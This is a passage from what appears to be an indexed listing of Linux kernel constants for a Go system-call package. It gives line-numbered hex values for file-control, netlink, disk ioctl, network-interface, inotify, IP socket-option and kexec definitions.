(line 1327) | F_GETFL = 0x3 constant F_GETLEASE (line 1328) | F_GETLEASE = 0x401 constant F_GETOWN_EX (line 1329) | F_GETOWN_EX = 0x10 constant F_GETPIPE_SZ (line 1330) | F_GETPIPE_SZ = 0x408 constant F_GETSIG (line 1331) | F_GETSIG = 0xb constant F_GET_FILE_RW_HINT (line 1332) | F_GET_FILE_RW_HINT = 0x40d constant F_GET_RW_HINT (line 1333) | F_GET_RW_HINT = 0x40b constant F_GET_SEALS (line 1334) | F_GET_SEALS = 0x40a constant F_LOCK (line 1335) | F_LOCK = 0x1 constant F_NOTIFY (line 1336) | F_NOTIFY = 0x402 constant F_OFD_GETLK (line 1337) | F_OFD_GETLK = 0x24 constant F_OFD_SETLK (line 1338) | F_OFD_SETLK = 0x25 constant F_OFD_SETLKW (line 1339) | F_OFD_SETLKW = 0x26 constant F_OK (line 1340) | F_OK = 0x0 constant F_SEAL_FUTURE_WRITE (line 1341) | F_SEAL_FUTURE_WRITE = 0x10 constant F_SEAL_GROW (line 1342) | F_SEAL_GROW = 0x4 constant F_SEAL_SEAL (line 1343) | F_SEAL_SEAL = 0x1 constant F_SEAL_SHRINK (line 1344) | F_SEAL_SHRINK = 0x2 constant F_SEAL_WRITE (line 1345) | F_SEAL_WRITE = 0x8 constant F_SETFD (line 1346) | F_SETFD = 0x2 constant F_SETFL (line 1347) | F_SETFL = 0x4 constant F_SETLEASE (line 1348) | F_SETLEASE = 0x400 constant F_SETOWN_EX (line 1349) | F_SETOWN_EX = 0xf constant F_SETPIPE_SZ (line 1350) | F_SETPIPE_SZ = 0x407 constant F_SETSIG (line 1351) | F_SETSIG = 0xa constant F_SET_FILE_RW_HINT (line 1352) | F_SET_FILE_RW_HINT = 0x40e constant F_SET_RW_HINT (line 1353) | F_SET_RW_HINT = 0x40c constant F_SHLCK (line 1354) | F_SHLCK = 0x8 constant F_TEST (line 1355) | F_TEST = 0x3 constant F_TLOCK (line 1356) | F_TLOCK = 0x2 constant F_ULOCK (line 1357) | F_ULOCK = 0x0 constant GENL_ADMIN_PERM (line 1358) | GENL_ADMIN_PERM = 0x1 constant GENL_CMD_CAP_DO (line 1359) | GENL_CMD_CAP_DO = 0x2 constant GENL_CMD_CAP_DUMP (line 1360) | GENL_CMD_CAP_DUMP = 0x4 constant GENL_CMD_CAP_HASPOL (line 1361) | GENL_CMD_CAP_HASPOL = 0x8 constant GENL_HDRLEN (line 1362) | GENL_HDRLEN = 0x4 constant GENL_ID_CTRL (line 1363) | GENL_ID_CTRL = 0x10 constant GENL_ID_PMCRAID (line 1364) | GENL_ID_PMCRAID = 0x12 constant GENL_ID_VFS_DQUOT (line 1365) | GENL_ID_VFS_DQUOT = 0x11 constant GENL_MAX_ID (line 1366) | GENL_MAX_ID = 0x3ff constant GENL_MIN_ID (line 1367) | GENL_MIN_ID = 0x10 constant GENL_NAMSIZ (line 1368) | GENL_NAMSIZ = 0x10 constant GENL_START_ALLOC (line 1369) | GENL_START_ALLOC = 0x13 constant GENL_UNS_ADMIN_PERM (line 1370) | GENL_UNS_ADMIN_PERM = 0x10 constant GRND_INSECURE (line 1371) | GRND_INSECURE = 0x4 constant GRND_NONBLOCK (line 1372) | GRND_NONBLOCK = 0x1 constant GRND_RANDOM (line 1373) | GRND_RANDOM = 0x2 constant HDIO_DRIVE_CMD (line 1374) | HDIO_DRIVE_CMD = 0x31f constant HDIO_DRIVE_CMD_AEB (line 1375) | HDIO_DRIVE_CMD_AEB = 0x31e constant HDIO_DRIVE_CMD_HDR_SIZE (line 1376) | HDIO_DRIVE_CMD_HDR_SIZE = 0x4 constant HDIO_DRIVE_HOB_HDR_SIZE (line 1377) | HDIO_DRIVE_HOB_HDR_SIZE = 0x8 constant HDIO_DRIVE_RESET (line 1378) | HDIO_DRIVE_RESET = 0x31c constant HDIO_DRIVE_TASK (line 1379) | HDIO_DRIVE_TASK = 0x31e constant HDIO_DRIVE_TASKFILE (line 1380) | HDIO_DRIVE_TASKFILE = 0x31d constant HDIO_DRIVE_TASK_HDR_SIZE (line 1381) | HDIO_DRIVE_TASK_HDR_SIZE = 0x8 constant HDIO_GETGEO (line 1382) | HDIO_GETGEO = 0x301 constant HDIO_GET_32BIT (line 1383) | HDIO_GET_32BIT = 0x309 constant HDIO_GET_ACOUSTIC (line 1384) | HDIO_GET_ACOUSTIC = 0x30f constant HDIO_GET_ADDRESS (line 1385) | HDIO_GET_ADDRESS = 0x310 constant HDIO_GET_BUSSTATE (line 1386) | HDIO_GET_BUSSTATE = 0x31a constant HDIO_GET_DMA (line 1387) | HDIO_GET_DMA = 0x30b constant HDIO_GET_IDENTITY (line 1388) | HDIO_GET_IDENTITY = 0x30d constant HDIO_GET_KEEPSETTINGS (line 1389) | HDIO_GET_KEEPSETTINGS = 0x308 constant HDIO_GET_MULTCOUNT (line 1390) | HDIO_GET_MULTCOUNT = 0x304 constant HDIO_GET_NICE (line 1391) | HDIO_GET_NICE = 0x30c constant HDIO_GET_NOWERR (line 1392) | HDIO_GET_NOWERR = 0x30a constant HDIO_GET_QDMA (line 1393) | HDIO_GET_QDMA = 0x305 constant HDIO_GET_UNMASKINTR (line 1394) | HDIO_GET_UNMASKINTR = 0x302 constant HDIO_GET_WCACHE (line 1395) | HDIO_GET_WCACHE = 0x30e constant HDIO_OBSOLETE_IDENTITY (line 1396) | HDIO_OBSOLETE_IDENTITY = 0x307 constant HDIO_SCAN_HWIF (line 1397) | HDIO_SCAN_HWIF = 0x328 constant HDIO_SET_32BIT (line 1398) | HDIO_SET_32BIT = 0x324 constant HDIO_SET_ACOUSTIC (line 1399) | HDIO_SET_ACOUSTIC = 0x32c constant HDIO_SET_ADDRESS (line 1400) | HDIO_SET_ADDRESS = 0x32f constant HDIO_SET_BUSSTATE (line 1401) | HDIO_SET_BUSSTATE = 0x32d constant HDIO_SET_DMA (line 1402) | HDIO_SET_DMA = 0x326 constant HDIO_SET_KEEPSETTINGS (line 1403) | HDIO_SET_KEEPSETTINGS = 0x323 constant HDIO_SET_MULTCOUNT (line 1404) | HDIO_SET_MULTCOUNT = 0x321 constant HDIO_SET_NICE (line 1405) | HDIO_SET_NICE = 0x329 constant HDIO_SET_NOWERR (line 1406) | HDIO_SET_NOWERR = 0x325 constant HDIO_SET_PIO_MODE (line 1407) | HDIO_SET_PIO_MODE = 0x327 constant HDIO_SET_QDMA (line 1408) | HDIO_SET_QDMA = 0x32e constant HDIO_SET_UNMASKINTR (line 1409) | HDIO_SET_UNMASKINTR = 0x322 constant HDIO_SET_WCACHE (line 1410) | HDIO_SET_WCACHE = 0x32b constant HDIO_SET_XFER (line 1411) | HDIO_SET_XFER = 0x306 constant HDIO_TRISTATE_HWIF (line 1412) | HDIO_TRISTATE_HWIF = 0x31b constant HDIO_UNREGISTER_HWIF (line 1413) | HDIO_UNREGISTER_HWIF = 0x32a constant HID_MAX_DESCRIPTOR_SIZE (line 1414) | HID_MAX_DESCRIPTOR_SIZE = 0x1000 constant HOSTFS_SUPER_MAGIC (line 1415) | HOSTFS_SUPER_MAGIC = 0xc0ffee constant HPFS_SUPER_MAGIC (line 1416) | HPFS_SUPER_MAGIC = 0xf995e849 constant HUGETLBFS_MAGIC (line 1417) | HUGETLBFS_MAGIC = 0x958458f6 constant IBSHIFT (line 1418) | IBSHIFT = 0x10 constant ICRNL (line 1419) | ICRNL = 0x100 constant IFA_F_DADFAILED (line 1420) | IFA_F_DADFAILED = 0x8 constant IFA_F_DEPRECATED (line 1421) | IFA_F_DEPRECATED = 0x20 constant IFA_F_HOMEADDRESS (line 1422) | IFA_F_HOMEADDRESS = 0x10 constant IFA_F_MANAGETEMPADDR (line 1423) | IFA_F_MANAGETEMPADDR = 0x100 constant IFA_F_MCAUTOJOIN (line 1424) | IFA_F_MCAUTOJOIN = 0x400 constant IFA_F_NODAD (line 1425) | IFA_F_NODAD = 0x2 constant IFA_F_NOPREFIXROUTE (line 1426) | IFA_F_NOPREFIXROUTE = 0x200 constant IFA_F_OPTIMISTIC (line 1427) | IFA_F_OPTIMISTIC = 0x4 constant IFA_F_PERMANENT (line 1428) | IFA_F_PERMANENT = 0x80 constant IFA_F_SECONDARY (line 1429) | IFA_F_SECONDARY = 0x1 constant IFA_F_STABLE_PRIVACY (line 1430) | IFA_F_STABLE_PRIVACY = 0x800 constant IFA_F_TEMPORARY (line 1431) | IFA_F_TEMPORARY = 0x1 constant IFA_F_TENTATIVE (line 1432) | IFA_F_TENTATIVE = 0x40 constant IFA_MAX (line 1433) | IFA_MAX = 0xb constant IFF_ALLMULTI (line 1434) | IFF_ALLMULTI = 0x200 constant IFF_ATTACH_QUEUE (line 1435) | IFF_ATTACH_QUEUE = 0x200 constant IFF_AUTOMEDIA (line 1436) | IFF_AUTOMEDIA = 0x4000 constant IFF_BROADCAST (line 1437) | IFF_BROADCAST = 0x2 constant IFF_DEBUG (line 1438) | IFF_DEBUG = 0x4 constant IFF_DETACH_QUEUE (line 1439) | IFF_DETACH_QUEUE = 0x400 constant IFF_DORMANT (line 1440) | IFF_DORMANT = 0x20000 constant IFF_DYNAMIC (line 1441) | IFF_DYNAMIC = 0x8000 constant IFF_ECHO (line 1442) | IFF_ECHO = 0x40000 constant IFF_LOOPBACK (line 1443) | IFF_LOOPBACK = 0x8 constant IFF_LOWER_UP (line 1444) | IFF_LOWER_UP = 0x10000 constant IFF_MASTER (line 1445) | IFF_MASTER = 0x400 constant IFF_MULTICAST (line 1446) | IFF_MULTICAST = 0x1000 constant IFF_MULTI_QUEUE (line 1447) | IFF_MULTI_QUEUE = 0x100 constant IFF_NAPI (line 1448) | IFF_NAPI = 0x10 constant IFF_NAPI_FRAGS (line 1449) | IFF_NAPI_FRAGS = 0x20 constant IFF_NOARP (line 1450) | IFF_NOARP = 0x80 constant IFF_NOFILTER (line 1451) | IFF_NOFILTER = 0x1000 constant IFF_NOTRAILERS (line 1452) | IFF_NOTRAILERS = 0x20 constant IFF_NO_CARRIER (line 1453) | IFF_NO_CARRIER = 0x40 constant IFF_NO_PI (line 1454) | IFF_NO_PI = 0x1000 constant IFF_ONE_QUEUE (line 1455) | IFF_ONE_QUEUE = 0x2000 constant IFF_PERSIST (line 1456) | IFF_PERSIST = 0x800 constant IFF_POINTOPOINT (line 1457) | IFF_POINTOPOINT = 0x10 constant IFF_PORTSEL (line 1458) | IFF_PORTSEL = 0x2000 constant IFF_PROMISC (line 1459) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 1460) | IFF_RUNNING = 0x40 constant IFF_SLAVE (line 1461) | IFF_SLAVE = 0x800 constant IFF_TAP (line 1462) | IFF_TAP = 0x2 constant IFF_TUN (line 1463) | IFF_TUN = 0x1 constant IFF_TUN_EXCL (line 1464) | IFF_TUN_EXCL = 0x8000 constant IFF_UP (line 1465) | IFF_UP = 0x1 constant IFF_VNET_HDR (line 1466) | IFF_VNET_HDR = 0x4000 constant IFF_VOLATILE (line 1467) | IFF_VOLATILE = 0x70c5a constant IFNAMSIZ (line 1468) | IFNAMSIZ = 0x10 constant IGNBRK (line 1469) | IGNBRK = 0x1 constant IGNCR (line 1470) | IGNCR = 0x80 constant IGNPAR (line 1471) | IGNPAR = 0x4 constant IMAXBEL (line 1472) | IMAXBEL = 0x2000 constant INLCR (line 1473) | INLCR = 0x40 constant INPCK (line 1474) | INPCK = 0x10 constant IN_ACCESS (line 1475) | IN_ACCESS = 0x1 constant IN_ALL_EVENTS (line 1476) | IN_ALL_EVENTS = 0xfff constant IN_ATTRIB (line 1477) | IN_ATTRIB = 0x4 constant IN_CLASSA_HOST (line 1478) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 1479) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 1480) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 1481) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 1482) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 1483) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 1484) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 1485) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 1486) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 1487) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 1488) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLOSE (line 1489) | IN_CLOSE = 0x18 constant IN_CLOSE_NOWRITE (line 1490) | IN_CLOSE_NOWRITE = 0x10 constant IN_CLOSE_WRITE (line 1491) | IN_CLOSE_WRITE = 0x8 constant IN_CREATE (line 1492) | IN_CREATE = 0x100 constant IN_DELETE (line 1493) | IN_DELETE = 0x200 constant IN_DELETE_SELF (line 1494) | IN_DELETE_SELF = 0x400 constant IN_DONT_FOLLOW (line 1495) | IN_DONT_FOLLOW = 0x2000000 constant IN_EXCL_UNLINK (line 1496) | IN_EXCL_UNLINK = 0x4000000 constant IN_IGNORED (line 1497) | IN_IGNORED = 0x8000 constant IN_ISDIR (line 1498) | IN_ISDIR = 0x40000000 constant IN_LOOPBACKNET (line 1499) | IN_LOOPBACKNET = 0x7f constant IN_MASK_ADD (line 1500) | IN_MASK_ADD = 0x20000000 constant IN_MASK_CREATE (line 1501) | IN_MASK_CREATE = 0x10000000 constant IN_MODIFY (line 1502) | IN_MODIFY = 0x2 constant IN_MOVE (line 1503) | IN_MOVE = 0xc0 constant IN_MOVED_FROM (line 1504) | IN_MOVED_FROM = 0x40 constant IN_MOVED_TO (line 1505) | IN_MOVED_TO = 0x80 constant IN_MOVE_SELF (line 1506) | IN_MOVE_SELF = 0x800 constant IN_ONESHOT (line 1507) | IN_ONESHOT = 0x80000000 constant IN_ONLYDIR (line 1508) | IN_ONLYDIR = 0x1000000 constant IN_OPEN (line 1509) | IN_OPEN = 0x20 constant IN_Q_OVERFLOW (line 1510) | IN_Q_OVERFLOW = 0x4000 constant IN_UNMOUNT (line 1511) | IN_UNMOUNT = 0x2000 constant IPPROTO_AH (line 1512) | IPPROTO_AH = 0x33 constant IPPROTO_BEETPH (line 1513) | IPPROTO_BEETPH = 0x5e constant IPPROTO_COMP (line 1514) | IPPROTO_COMP = 0x6c constant IPPROTO_DCCP (line 1515) | IPPROTO_DCCP = 0x21 constant IPPROTO_DSTOPTS (line 1516) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 1517) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 1518) | IPPROTO_ENCAP = 0x62 constant IPPROTO_ESP (line 1519) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERNET (line 1520) | IPPROTO_ETHERNET = 0x8f constant IPPROTO_FRAGMENT (line 1521) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GRE (line 1522) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 1523) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 1524) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 1525) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 1526) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 1527) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 1528) | IPPROTO_IP = 0x0 constant IPPROTO_IPIP (line 1529) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV6 (line 1530) | IPPROTO_IPV6 = 0x29 constant IPPROTO_L2TP (line 1531) | IPPROTO_L2TP = 0x73 constant IPPROTO_MH (line 1532) | IPPROTO_MH = 0x87 constant IPPROTO_MPLS (line 1533) | IPPROTO_MPLS = 0x89 constant IPPROTO_MPTCP (line 1534) | IPPROTO_MPTCP = 0x106 constant IPPROTO_MTP (line 1535) | IPPROTO_MTP = 0x5c constant IPPROTO_NONE (line 1536) | IPPROTO_NONE = 0x3b constant IPPROTO_PIM (line 1537) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 1538) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 1539) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 1540) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 1541) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 1542) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 1543) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 1544) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 1545) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 1546) | IPPROTO_UDPLITE = 0x88 constant IPV6_2292DSTOPTS (line 1547) | IPV6_2292DSTOPTS = 0x4 constant IPV6_2292HOPLIMIT (line 1548) | IPV6_2292HOPLIMIT = 0x8 constant IPV6_2292HOPOPTS (line 1549) | IPV6_2292HOPOPTS = 0x3 constant IPV6_2292PKTINFO (line 1550) | IPV6_2292PKTINFO = 0x2 constant IPV6_2292PKTOPTIONS (line 1551) | IPV6_2292PKTOPTIONS = 0x6 constant IPV6_2292RTHDR (line 1552) | IPV6_2292RTHDR = 0x5 constant IPV6_ADDRFORM (line 1553) | IPV6_ADDRFORM = 0x1 constant IPV6_ADDR_PREFERENCES (line 1554) | IPV6_ADDR_PREFERENCES = 0x48 constant IPV6_ADD_MEMBERSHIP (line 1555) | IPV6_ADD_MEMBERSHIP = 0x14 constant IPV6_AUTHHDR (line 1556) | IPV6_AUTHHDR = 0xa constant IPV6_AUTOFLOWLABEL (line 1557) | IPV6_AUTOFLOWLABEL = 0x46 constant IPV6_CHECKSUM (line 1558) | IPV6_CHECKSUM = 0x7 constant IPV6_DONTFRAG (line 1559) | IPV6_DONTFRAG = 0x3e constant IPV6_DROP_MEMBERSHIP (line 1560) | IPV6_DROP_MEMBERSHIP = 0x15 constant IPV6_DSTOPTS (line 1561) | IPV6_DSTOPTS = 0x3b constant IPV6_FLOW (line 1562) | IPV6_FLOW = 0x11 constant IPV6_FREEBIND (line 1563) | IPV6_FREEBIND = 0x4e constant IPV6_HDRINCL (line 1564) | IPV6_HDRINCL = 0x24 constant IPV6_HOPLIMIT (line 1565) | IPV6_HOPLIMIT = 0x34 constant IPV6_HOPOPTS (line 1566) | IPV6_HOPOPTS = 0x36 constant IPV6_IPSEC_POLICY (line 1567) | IPV6_IPSEC_POLICY = 0x22 constant IPV6_JOIN_ANYCAST (line 1568) | IPV6_JOIN_ANYCAST = 0x1b constant IPV6_JOIN_GROUP (line 1569) | IPV6_JOIN_GROUP = 0x14 constant IPV6_LEAVE_ANYCAST (line 1570) | IPV6_LEAVE_ANYCAST = 0x1c constant IPV6_LEAVE_GROUP (line 1571) | IPV6_LEAVE_GROUP = 0x15 constant IPV6_MINHOPCOUNT (line 1572) | IPV6_MINHOPCOUNT = 0x49 constant IPV6_MTU (line 1573) | IPV6_MTU = 0x18 constant IPV6_MTU_DISCOVER (line 1574) | IPV6_MTU_DISCOVER = 0x17 constant IPV6_MULTICAST_ALL (line 1575) | IPV6_MULTICAST_ALL = 0x1d constant IPV6_MULTICAST_HOPS (line 1576) | IPV6_MULTICAST_HOPS = 0x12 constant IPV6_MULTICAST_IF (line 1577) | IPV6_MULTICAST_IF = 0x11 constant IPV6_MULTICAST_LOOP (line 1578) | IPV6_MULTICAST_LOOP = 0x13 constant IPV6_NEXTHOP (line 1579) | IPV6_NEXTHOP = 0x9 constant IPV6_ORIGDSTADDR (line 1580) | IPV6_ORIGDSTADDR = 0x4a constant IPV6_PATHMTU (line 1581) | IPV6_PATHMTU = 0x3d constant IPV6_PKTINFO (line 1582) | IPV6_PKTINFO = 0x32 constant IPV6_PMTUDISC_DO (line 1583) | IPV6_PMTUDISC_DO = 0x2 constant IPV6_PMTUDISC_DONT (line 1584) | IPV6_PMTUDISC_DONT = 0x0 constant IPV6_PMTUDISC_INTERFACE (line 1585) | IPV6_PMTUDISC_INTERFACE = 0x4 constant IPV6_PMTUDISC_OMIT (line 1586) | IPV6_PMTUDISC_OMIT = 0x5 constant IPV6_PMTUDISC_PROBE (line 1587) | IPV6_PMTUDISC_PROBE = 0x3 constant IPV6_PMTUDISC_WANT (line 1588) | IPV6_PMTUDISC_WANT = 0x1 constant IPV6_RECVDSTOPTS (line 1589) | IPV6_RECVDSTOPTS = 0x3a constant IPV6_RECVERR (line 1590) | IPV6_RECVERR = 0x19 constant IPV6_RECVERR_RFC4884 (line 1591) | IPV6_RECVERR_RFC4884 = 0x1f constant IPV6_RECVFRAGSIZE (line 1592) | IPV6_RECVFRAGSIZE = 0x4d constant IPV6_RECVHOPLIMIT (line 1593) | IPV6_RECVHOPLIMIT = 0x33 constant IPV6_RECVHOPOPTS (line 1594) | IPV6_RECVHOPOPTS = 0x35 constant IPV6_RECVORIGDSTADDR (line 1595) | IPV6_RECVORIGDSTADDR = 0x4a constant IPV6_RECVPATHMTU (line 1596) | IPV6_RECVPATHMTU = 0x3c constant IPV6_RECVPKTINFO (line 1597) | IPV6_RECVPKTINFO = 0x31 constant IPV6_RECVRTHDR (line 1598) | IPV6_RECVRTHDR = 0x38 constant IPV6_RECVTCLASS (line 1599) | IPV6_RECVTCLASS = 0x42 constant IPV6_ROUTER_ALERT (line 1600) | IPV6_ROUTER_ALERT = 0x16 constant IPV6_ROUTER_ALERT_ISOLATE (line 1601) | IPV6_ROUTER_ALERT_ISOLATE = 0x1e constant IPV6_RTHDR (line 1602) | IPV6_RTHDR = 0x39 constant IPV6_RTHDRDSTOPTS (line 1603) | IPV6_RTHDRDSTOPTS = 0x37 constant IPV6_RTHDR_LOOSE (line 1604) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 1605) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 1606) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_RXDSTOPTS (line 1607) | IPV6_RXDSTOPTS = 0x3b constant IPV6_RXHOPOPTS (line 1608) | IPV6_RXHOPOPTS = 0x36 constant IPV6_TCLASS (line 1609) | IPV6_TCLASS = 0x43 constant IPV6_TRANSPARENT (line 1610) | IPV6_TRANSPARENT = 0x4b constant IPV6_UNICAST_HOPS (line 1611) | IPV6_UNICAST_HOPS = 0x10 constant IPV6_UNICAST_IF (line 1612) | IPV6_UNICAST_IF = 0x4c constant IPV6_USER_FLOW (line 1613) | IPV6_USER_FLOW = 0xe constant IPV6_V6ONLY (line 1614) | IPV6_V6ONLY = 0x1a constant IPV6_XFRM_POLICY (line 1615) | IPV6_XFRM_POLICY = 0x23 constant IP_ADD_MEMBERSHIP (line 1616) | IP_ADD_MEMBERSHIP = 0x23 constant IP_ADD_SOURCE_MEMBERSHIP (line 1617) | IP_ADD_SOURCE_MEMBERSHIP = 0x27 constant IP_BIND_ADDRESS_NO_PORT (line 1618) | IP_BIND_ADDRESS_NO_PORT = 0x18 constant IP_BLOCK_SOURCE (line 1619) | IP_BLOCK_SOURCE = 0x26 constant IP_CHECKSUM (line 1620) | IP_CHECKSUM = 0x17 constant IP_DEFAULT_MULTICAST_LOOP (line 1621) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 1622) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 1623) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 1624) | IP_DROP_MEMBERSHIP = 0x24 constant IP_DROP_SOURCE_MEMBERSHIP (line 1625) | IP_DROP_SOURCE_MEMBERSHIP = 0x28 constant IP_FREEBIND (line 1626) | IP_FREEBIND = 0xf constant IP_HDRINCL (line 1627) | IP_HDRINCL = 0x3 constant IP_IPSEC_POLICY (line 1628) | IP_IPSEC_POLICY = 0x10 constant IP_MAXPACKET (line 1629) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 1630) | IP_MAX_MEMBERSHIPS = 0x14 constant IP_MF (line 1631) | IP_MF = 0x2000 constant IP_MINTTL (line 1632) | IP_MINTTL = 0x15 constant IP_MSFILTER (line 1633) | IP_MSFILTER = 0x29 constant IP_MSS (line 1634) | IP_MSS = 0x240 constant IP_MTU (line 1635) | IP_MTU = 0xe constant IP_MTU_DISCOVER (line 1636) | IP_MTU_DISCOVER = 0xa constant IP_MULTICAST_ALL (line 1637) | IP_MULTICAST_ALL = 0x31 constant IP_MULTICAST_IF (line 1638) | IP_MULTICAST_IF = 0x20 constant IP_MULTICAST_LOOP (line 1639) | IP_MULTICAST_LOOP = 0x22 constant IP_MULTICAST_TTL (line 1640) | IP_MULTICAST_TTL = 0x21 constant IP_NODEFRAG (line 1641) | IP_NODEFRAG = 0x16 constant IP_OFFMASK (line 1642) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 1643) | IP_OPTIONS = 0x4 constant IP_ORIGDSTADDR (line 1644) | IP_ORIGDSTADDR = 0x14 constant IP_PASSSEC (line 1645) | IP_PASSSEC = 0x12 constant IP_PKTINFO (line 1646) | IP_PKTINFO = 0x8 constant IP_PKTOPTIONS (line 1647) | IP_PKTOPTIONS = 0x9 constant IP_PMTUDISC (line 1648) | IP_PMTUDISC = 0xa constant IP_PMTUDISC_DO (line 1649) | IP_PMTUDISC_DO = 0x2 constant IP_PMTUDISC_DONT (line 1650) | IP_PMTUDISC_DONT = 0x0 constant IP_PMTUDISC_INTERFACE (line 1651) | IP_PMTUDISC_INTERFACE = 0x4 constant IP_PMTUDISC_OMIT (line 1652) | IP_PMTUDISC_OMIT = 0x5 constant IP_PMTUDISC_PROBE (line 1653) | IP_PMTUDISC_PROBE = 0x3 constant IP_PMTUDISC_WANT (line 1654) | IP_PMTUDISC_WANT = 0x1 constant IP_RECVERR (line 1655) | IP_RECVERR = 0xb constant IP_RECVERR_RFC4884 (line 1656) | IP_RECVERR_RFC4884 = 0x1a constant IP_RECVFRAGSIZE (line 1657) | IP_RECVFRAGSIZE = 0x19 constant IP_RECVOPTS (line 1658) | IP_RECVOPTS = 0x6 constant IP_RECVORIGDSTADDR (line 1659) | IP_RECVORIGDSTADDR = 0x14 constant IP_RECVRETOPTS (line 1660) | IP_RECVRETOPTS = 0x7 constant IP_RECVTOS (line 1661) | IP_RECVTOS = 0xd constant IP_RECVTTL (line 1662) | IP_RECVTTL = 0xc constant IP_RETOPTS (line 1663) | IP_RETOPTS = 0x7 constant IP_RF (line 1664) | IP_RF = 0x8000 constant IP_ROUTER_ALERT (line 1665) | IP_ROUTER_ALERT = 0x5 constant IP_TOS (line 1666) | IP_TOS = 0x1 constant IP_TRANSPARENT (line 1667) | IP_TRANSPARENT = 0x13 constant IP_TTL (line 1668) | IP_TTL = 0x2 constant IP_UNBLOCK_SOURCE (line 1669) | IP_UNBLOCK_SOURCE = 0x25 constant IP_UNICAST_IF (line 1670) | IP_UNICAST_IF = 0x32 constant IP_USER_FLOW (line 1671) | IP_USER_FLOW = 0xd constant IP_XFRM_POLICY (line 1672) | IP_XFRM_POLICY = 0x11 constant ISOFS_SUPER_MAGIC (line 1673) | ISOFS_SUPER_MAGIC = 0x9660 constant ISTRIP (line 1674) | ISTRIP = 0x20 constant ITIMER_PROF (line 1675) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 1676) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 1677) | ITIMER_VIRTUAL = 0x1 constant IUTF8 (line 1678) | IUTF8 = 0x4000 constant IXANY (line 1679) | IXANY = 0x800 constant JFFS2_SUPER_MAGIC (line 1680) | JFFS2_SUPER_MAGIC = 0x72b6 constant KCMPROTO_CONNECTED (line 1681) | KCMPROTO_CONNECTED = 0x0 constant KCM_RECV_DISABLE (line 1682) | KCM_RECV_DISABLE = 0x1 constant KEXEC_ARCH_386 (line 1683) | KEXEC_ARCH_386 = 0x30000 constant KEXEC_ARCH_68K (line 1684) | KEXEC_ARCH_68K = 0x40000 constant KEXEC_ARCH_AARCH64 (line 1685) | KEXEC_ARCH_AARCH64 = 0xb70000 constant KEXEC_ARCH_ARM (line 1686) | KEXEC_ARCH_ARM = 0x280000 constant KEXEC_ARCH_DEFAULT (line 1687) | KEXEC_ARCH_DEFAULT = 0x0 constant KEXEC_ARCH_IA_64 (line 1688) | KEXEC_ARCH_IA_64 = 0x320000 constant KEXEC_ARCH_LOONGARCH (line 1689) | KEXEC_ARCH_LOONGARCH = 0x1020000 constant KEXEC_ARCH_MASK (line 1690) | KEXEC_ARCH_MASK = 0xffff0000 constant KEXEC_ARCH_MIPS (line 1691) | KEXEC_ARCH_MIPS = 0x80000 constant KEXEC_ARCH_MIPS_LE (line 1692) | KEXEC_ARCH_MIPS_LE = 0xa0000 constant KEXEC_ARCH_PARISC (line 1693) | KEXEC_ARCH_PARISC = 0xf0000 constant KEXEC_ARCH_PPC (line 1694) | KEXEC_ARCH_PPC = 0x140000 constant KEXEC_ARCH_PPC64 (line 1695) | KEXEC_ARCH_PPC64 = 0x150000 constant KEXEC_ARCH_RISCV (line 1696) | KEXEC_ARCH_RISCV = 0xf30000 constant KEXEC_ARCH_S390 (line 1697) | KEXEC_ARCH_S390 = 0x160000 constant KEXEC_ARCH_SH (line 1698) | KEXEC_ARCH_SH = 0x2a0000 constant KEXEC_ARCH_X86_64 (line 1699) | KEXEC_ARCH_X86_64 = 0x3e0000 constant KEXEC_FILE_NO_INITRAMFS (line 1700) | KEXEC_FILE_NO_INITRAMFS = 0x4 constant KEXEC_FILE_ON_CRASH (line 1701) | KEXEC_FILE_ON_CRASH = 0x2 constant KEXEC_FILE_UNLOAD (line 1702) | KEXEC_FILE_UNLOAD = 0x1 constant KEXEC_ON_CRASH (line 1703) | KEXEC_ON_CRASH = 0x1 constant KEXEC_PRESERVE_CONTEXT (line 1704) | 